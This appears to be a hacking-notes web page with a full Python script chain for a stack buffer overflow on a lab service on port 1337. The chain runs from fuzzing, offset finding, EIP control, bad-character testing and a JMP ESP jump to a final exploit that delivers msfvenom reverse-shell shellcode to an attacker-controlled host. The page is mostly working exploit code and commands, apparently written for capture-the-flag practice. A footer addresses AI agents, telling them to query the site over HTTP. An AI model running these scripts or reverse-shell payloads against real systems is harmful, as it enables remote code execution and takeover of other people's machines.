# BoF Script Python

## 1-fuzzer.py

The main idea is send the "A" (string) as much as possible for crashing the service.

```python
import socket, time, sys

ip = "10.10.12.54"
port = 1337
timeout = 5
prefix = "OVERFLOW5 "
string = prefix + "A" * 100
while True:
        try:
                with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                        s.settimeout(timeout)
                        s.connect((ip, port))
                        s.recv(1024)
                        print(f"Fuzzing with {format(len(string) - len(prefix))} bytes")
                        s.send(bytes(string, "latin-1"))
                        s.recv(1024)
        except:
                print(f"Fuzzing crashed at {format(len(string) - len(prefix))}")
                sys.exit(0)
        string += "A" * 100
        time.sleep(1)
```

## 2-pattern.py

Need to change the payload with the number of pattern (get from fuzzer) + 200:

Use this website for generating pattern --> <https://wiremask.eu/tools/buffer-overflow-pattern-generator/>

```python
import socket, time, sys


ip = "10.10.12.54"

port = 1337

timeout = 5
prefix = "OVERFLOW5 "
payload = "<PUT PATTERN HERE>"
string = prefix + payload


try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                s.connect((ip, port))
                s.recv(1024)
                print(f"Fuzzing with {format(len(string) - len(prefix))} bytes")
                s.send(bytes(string, "latin-1"))
                s.recv(1024)
except:
        print(f"Fuzzing crashed at {format(len(string) - len(prefix))}")
        sys.exit(0)

```

## 3-checkEIP.py

Optional if you need to make sure that you able to control EIP with "BBBB"

```python
import socket, time, sys
ip = "10.10.192.42"
port = 1337
timeout = 5
prefix = "OVERFLOW3 "
offset = 1274
string = prefix + "A"*offset + "BBBB"
try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                s.connect((ip, port))
                s.recv(1024)
                print(f"Fuzzing with {format(len(string) - len(prefix))} bytes")
                s.send(bytes(string, "latin-1"))
                s.recv(1024)
except:
                print(f"Fuzzing crashed at {format(len(string) - len(prefix))}")
                sys.exit(0)
```

## 4-sendBadChar.py

Change the payload with sorted hex, and checking which character are bad for the service while running. \
Generate badchar with this python script --> <https://github.com/joshua17sc/Buffer-Overflows/blob/main/create.py>

```python
import socket, time, sys


ip = "10.10.12.54"
port = 1337
timeout = 5
prefix = "OVERFLOW5 "
payload = "<BAD CHAR HERE>"
offset = 314
string = prefix + ("A"*offset) + "BBBB" + payload
try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                s.connect((ip, port))
                s.recv(1024)
                print(f"Fuzzing with {format(len(string) - len(prefix))} bytes")
                s.send(bytes(string, "latin-1"))
                s.recv(1024)
except:
                print(f"Fuzzing crashed at {format(len(string) - len(prefix))}")
                sys.exit(0)
```

## 5-jmp\_esp\_module.py

change "BBBB" / EIP with module address (jmp\_esp), so when EIP loaded, your process going to ESP (your payload)

```python
import socket, time, sys
ip = "10.10.192.42"
port = 1337
timeout = 5
prefix = "OVERFLOW3 "
payload = "\x01\x02\x03\x04\x05\x06\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
module = "<MODULE HERE>"
offset = 1274
string = prefix + ("A"*offset) + module + payload


try:
                with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                        s.settimeout(timeout)
                        s.connect((ip, port))
                        s.recv(1024)
                        print(f"Fuzzing with {format(len(string) - len(prefix))} bytes")
                        s.send(bytes(string, "latin-1"))
                        s.recv(1024)
except:
                print(f"Fuzzing crashed at {format(len(string) - len(prefix))}")
                sys.exit(0)

```

6-revshell.py

Sending payload (shell code) to the server.

Generate shellcode with msfvenom

```bash
# msfvenom script
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1337 EXITFUNC=thread -b "<badchars>" -a x86 -f c -v shellcode

# example
msfvenom -p windows/shell_reverse_tcp LHOST=10.4.1.97 LPORT=11111 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -a x86 -f c -v shellcode
```

```python
import socket, time, sys
ip = "10.10.172.48"
port = 1337
timeout = 5
prefix = "OVERFLOW4 "

payload = (<SHELLCODE FROM MSVENOM>)
offset = 2026
padding = "\x90" * 16
module = "\x05\x12\x50\x62"
string = prefix + ("A"*offset) + module + padding +payload


try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                s.connect((ip, port))
                s.recv(1024)
                print(f"Fuzzing with {format(len(string) - len(prefix))} bytes")
                s.send(bytes(string, "latin-1"))
                s.recv(1024)
except:
                print(f"Fuzzing crashed at {format(len(string) - len(prefix))}")
                sys.exit(0)
```

## Create Bad Char

create.py

```
#!/usr/bin/env python3

from __future__ import print_function

#tart with 00 and add any others you find
bad = "00".split()

#turns them into a nice string to copy into python
print("badchars = ")
for x in range(1, 256):
        if "{:02x}".format(x) not in bad: 
                print("\\x" + "{:02x}".format(x), end='')

#creates a nice string to use in Mona
print("\n\nfor mona")
print("!mona bytearray -b '",end='')
for byte in bad:
        print("\\x{}".format(byte), end='')
print("'")
print()

```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacker-mind.gitbook.io/hacker-mind/buffer-overflow/bof-script-python.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.